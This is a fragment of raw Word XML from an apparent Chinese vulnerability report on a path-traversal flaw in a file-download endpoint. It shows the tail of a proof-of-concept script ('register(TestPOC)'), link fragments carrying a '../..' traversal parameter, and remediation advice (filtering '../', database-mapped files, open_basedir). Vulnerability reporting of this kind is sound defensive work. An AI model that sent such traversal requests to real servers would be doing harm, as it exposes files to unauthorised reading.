          <w:p w14:paraId="40287BFB" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>return output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C291649" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F48E102" w14:textId="77777777" w:rsidR="000E0920" w:rsidRPr="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29E0AEB6" w14:textId="29ECF88C" w:rsidR="00DB0454" w:rsidRDefault="000E0920" w:rsidP="000E0920">
            <w:r w:rsidRPr="000E0920">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>register(TestPOC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="13FC1D8E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E5D8AC8" w14:textId="77777777" w:rsidR="00DB0454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lastRenderedPageBreak/>
              <w:t>修复方案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E7A2" w14:textId="67B0A7A0" w:rsidR="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920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过滤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>../</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等敏感字符，使用户在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中不能回溯上级目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E772024" w14:textId="1B190879" w:rsidR="000E0920" w:rsidRDefault="000E0920" w:rsidP="000E0920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文件下载时判断输入的路径，最好的方法是文件应该在数据库中进行一一对应，避免通过输入绝对路径来获取文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A2073A" w14:textId="4F242EE3" w:rsidR="00DB0454" w:rsidRDefault="000E0920" w:rsidP="000E0920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php.ini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open_basedir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限定文件访问范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76AAA5D5" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="0BA8C0B6" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:sectPr w:rsidR="00DB0454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430D" w14:textId="77777777" w:rsidR="00E522C2" w:rsidRDefault="00E522C2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5B41849D" w14:textId="77777777" w:rsidR="00E522C2" w:rsidRDefault="00E5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EA2DF" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a3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2609D" wp14:editId="63314B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3C0FFB" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
                          <w:pPr>
                            <w:pStyle w:val="a3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2609D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53C0FFB" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
                    <w:pPr>
                      <w:pStyle w:val="a3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EF53" w14:textId="77777777" w:rsidR="00E522C2" w:rsidRDefault="00E522C2">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6EBCB2AC" w14:textId="77777777" w:rsidR="00E522C2" w:rsidRDefault="00E52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4660" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="a4"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="444AA45A" wp14:editId="7E8FE789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C4CA55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5C4CA55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E8F3EDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73BC755C"/>
    <w:lvl w:ilvl="0" w:tplc="AB38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6863744">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1010568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D969B9"/>
    <w:rsid w:val="000C159A"/>
    <w:rsid w:val="000E0920"/>
    <w:rsid w:val="001277A1"/>
    <w:rsid w:val="001503F0"/>
    <w:rsid w:val="0023223C"/>
    <w:rsid w:val="002D23FC"/>
    <w:rsid w:val="003A317C"/>
    <w:rsid w:val="004622D3"/>
    <w:rsid w:val="004953C9"/>
    <w:rsid w:val="004C741B"/>
    <w:rsid w:val="00517E86"/>
    <w:rsid w:val="005833C7"/>
    <w:rsid w:val="005C4358"/>
    <w:rsid w:val="005C7C4F"/>
    <w:rsid w:val="005E78E8"/>
    <w:rsid w:val="00633FDD"/>
    <w:rsid w:val="006373B3"/>
    <w:rsid w:val="00645E2B"/>
    <w:rsid w:val="006953BC"/>
    <w:rsid w:val="00830326"/>
    <w:rsid w:val="00886F98"/>
    <w:rsid w:val="008D5D8F"/>
    <w:rsid w:val="009765F8"/>
    <w:rsid w:val="00A72F07"/>
    <w:rsid w:val="00B03A01"/>
    <w:rsid w:val="00B46086"/>
    <w:rsid w:val="00B60DA3"/>
    <w:rsid w:val="00DB0454"/>
    <w:rsid w:val="00DB2EB1"/>
    <w:rsid w:val="00E1719F"/>
    <w:rsid w:val="00E37F57"/>
    <w:rsid w:val="00E522C2"/>
    <w:rsid w:val="00E97D13"/>
    <w:rsid w:val="00E97D68"/>
    <w:rsid w:val="00EF3D8A"/>
    <w:rsid w:val="00F33EA6"/>
    <w:rsid w:val="00FD119F"/>
    <w:rsid w:val="02AF01BF"/>
    <w:rsid w:val="05D969B9"/>
    <w:rsid w:val="09CA347F"/>
    <w:rsid w:val="0D8419EE"/>
    <w:rsid w:val="252424BD"/>
    <w:rsid w:val="344416FF"/>
    <w:rsid w:val="37B74831"/>
    <w:rsid w:val="3EAE274A"/>
    <w:rsid w:val="45306C87"/>
    <w:rsid w:val="4D5E093E"/>
    <w:rsid w:val="562522C8"/>
    <w:rsid w:val="587310CB"/>
    <w:rsid w:val="5D652628"/>
    <w:rsid w:val="6C814395"/>
    <w:rsid w:val="6CA850CC"/>
    <w:rsid w:val="6F871FE7"/>
    <w:rsid w:val="71305E2E"/>
    <w:rsid w:val="72320FFF"/>
    <w:rsid w:val="72FE5900"/>
    <w:rsid w:val="777D7D00"/>
    <w:rsid w:val="78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25DDB0"/>
  <w15:docId w15:val="{7B9EED66-E26C-4993-BC5A-DFC0FF53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Indent 2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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="100" w:before="100" w:afterLines="100" w:after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iPriority w:val="99"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="400" w:lineRule="exac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9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="30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20">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
      </w:tabs>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="000000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Pr>
      <w:b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A7">
    <w:name w:val="A表格文字居中"/>
    <w:basedOn w:val="a"/>
    <w:qFormat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80/file/downFileContent?contentId=1&amp;sortName=../..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0/file/downFileContent?contentId=1&amp;sortName=../..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袁 铭泽</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-21T12:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-21T12:11:00Z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F961DC4C1D9B460CAB021EA163E041CB</vt:lpwstr>
  </property>
</Properties>
</file>